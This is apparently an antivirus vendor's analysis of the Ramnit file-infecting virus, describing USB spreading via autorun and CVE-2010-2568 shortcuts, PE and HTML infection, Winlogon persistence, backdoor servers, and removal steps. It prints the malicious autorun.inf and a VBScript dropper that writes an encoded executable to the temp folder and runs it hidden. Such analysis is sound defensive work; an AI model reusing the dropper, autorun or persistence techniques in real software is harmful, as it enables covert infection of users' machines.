Virus.Win32.Ramnit.a

by Atlantis on April 12th, 2012 in Malware Descriptions.

Detect: Virus.Win32.Ramnit.a

Platform: Win32

Type: Virus

Size: 103936 bytes

Language: C++

md5: CDF0778E1B80069D137A3E7A0C7C787F

sha1: E1826123B190C1FB3D11BBEA33EF6D1CCEABAD43

Summary

It is a malicious program which infects files on a User's PC.

Technical Details

Spreading over Removable Storage Devices

On all removable storage devices connected to the infected computer, the virus creates the following files:

<infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)

<infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)

<infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)

<infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)

<infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)

<infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)

<infected volume name>:\autorun.inf (11964 bytes)

where

  • <ID> — is a digit identifier (e.g.: "1-4-83-4678327503-5842818778-105234524-7024"),
  • <rnd_1>, <rnd_2> — random Latin alphabet sequences (e.g.: "xVgGwSIp", "lwTCZgQP").

The "autorun.inf" file contains a malicious script:

[autorun]

action=Open

icon=%WinDir%\system32\shell32.dll,4

shellexecute=\RECYCLER\S-<ID>\<rnd_2>.exe

shell\explore\command=\RECYCLER\S-<ID>\<rnd_2>.exe

USEAUTOPLAY=1

shell\Open\command=\RECYCLER\S-<ID>\<rnd_2>.exe

The script is executed each time the user opens the infected disk using the Windows Explorer if the autoplay function is turned on. Being executed, the script launches the "<rnd_2>.exe" file. Shortcuts created by the malicious program are exploits which use the CVE-2010-2568 vulnerability. In the "shell32.dll" library, this vulnerability consists in error of the shortcut processing (lnk and .pif files) and allows launching a code of random Windows libraries when hitting icons to open programs by the Windows Explorer. The code of the "<rnd_1>.cpl" library is launched. Being executed, it launches the "<rnd_2>.exe" file. The malicious program prevents modifying the files described above and creates them in an endless cycle.

File Infection

The virus infects files with the following extensions:

exe

html

dll

htm

Executive files and Windows dynamic link libraries are infected by adding the virus body in the end of the last PE-section of the target file. With that, an entry point to the program changes in such a way as to allow the virus code to manage it. While infecting the HTML, HTM files, the following script is added in the end of the target document:

<SCRIPT

Language=VBScript><!--

DropFileName = "svchost.exe"

WriteData = "4D5A... (binary virus body)"

Set FSO = CreateObject("Scripting.FileSystemObject")

DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName

If

FSO.FileExists(DropPath)=False

Then

Set FileObj = FSO.CreateTextFile(DropPath, True)

For i = 1 To Len(WriteData) Step 2

FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))

Next

FileObj.Close

End If

Set WSHshell = CreateObject("WScript.Shell")

WSHshell.Run DropPath, 0

//--></SCRIPT>

Thus, upon each launch, the virus body is saved to the current user's temporary folder as

%Temp%\svchost.exe

and launched for execution.

Payload

Once the infected file is launched, the Trojan decrypts and extracts the following file from its body:

%WorkDir%\<name of the infected file being launched>Srv.exe

Then, the created file is launched for execution. With that, a copy of the file is created and launched:

%Program Files%\Microsoft\WaterMark.exe

Then, the "WaterMark.exe" process launches an example of the "svchost.exe" system process and injects its code into this process which performs the following actions:

  • Creates a unique identifier with the following name to control the uniqueness of its process in the system:

    Global\SYSTEM_DEMETRA_MAIN

  • Modifies a registry key value to automatically run a malicious software copy created earlier:

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

    "Userinit" = "%System%\userinit.exe,,%Program files%\microsoft\watermark.exe"

    With that, the copy is launched by the "winlogon.exe" process even if a computer starts in a safe mode.

  • Prevents modifying autorun registry key as well as the "WaterMark.exe" file.

  • Creates a configuration file to store the current settings of the malicious software:

    %System%\dmlconf.dat

  • Visit the following resource to check for a connection to the Internet:

    google.com

  • Realizes the backdoor. To get a list of commands, it connects to the servers:

    tybdtyutjfyvetscev.com

    ervwetyrbuyouiylkdhrbt.com

    tybsyiutnrtvtybdrser.com

    Depending on the command(s) get from the intruder, the backdoor can perform the following actions:

    - upload files to the infected computer and launch them for execution.

    - connect to another server to get commands.

  • The code injected into the address space of the "svchost.exe" process executes a functionality described in the Spreading over Removable Storage Devices and File Infection sections.

Removal Recommendations

To delete a malicious program, proceed through the steps listed below:

  1. Run a full scan of your computer using the Antivirus program with the updated definition database.

  2. Do not launch the EXE, HTM, HTML files and do not reboot your computer until a full scan is complete.

  3. Restore the infected files from the backup copies.

  4. Restore the registry key value (How to Work with System Registry):

    [HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]

    "Userinit" = "userinit.exe"

  5. Delete the following files:

    <infected volume name>:\Recycler\S-<ID>\<rnd_1>.cpl (3584 bytes)

    <infected volume name>:\Recycler\S-<ID>\<rnd_2>.exe (56832 bytes)

    <infected volume name>:\Copy of Shortcut to (1).lnk (691 bytes)

    <infected volume name>:\Copy of Shortcut to (2).lnk (722 bytes)

    <infected volume name>:\Copy of Shortcut to (3).lnk (858 bytes)

    <infected volume name>:\Copy of Shortcut to (4).lnk (867 bytes)

    <infected volume name>:\autorun.inf (11964 bytes)

    %Temp%\svchost.exe

    %WorkDir%\<name of infected file being launched >Srv.exe

    %Program Files%\Microsoft\WaterMark.exe

  6. Delete the original Trojan file (its file name and location depends on the way the Trojan originally penetrated a user’s computer).

  7. Delete an original Trojan file (its location on the infected PC depends on the way the program has been installed on the PC).

  8. Clean the Temporary Internet Files folder which contains infected files.